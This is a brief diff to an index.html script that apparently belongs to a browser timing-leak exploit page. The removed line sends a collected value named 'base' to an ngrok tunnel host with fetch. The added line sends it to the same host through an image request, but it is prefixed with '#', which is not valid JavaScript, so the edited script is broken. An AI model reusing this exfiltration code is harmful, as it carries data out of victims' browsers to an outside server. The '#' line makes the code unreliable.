--- a/index.html
+++ b/index.html
@@ -115,7 +115,7 @@ Can use requestAnimationFrame and requestIdleCallback to reliably check when a l
                 }
             }
 
-            await fetch("https://dc60-61-222-168-195.jp.ngrok.io?" + base)
+            # (new Image()).src = 'https://dc60-61-222-168-195.jp.ngrok.io?' + base;
         }
         setup()
     </script>
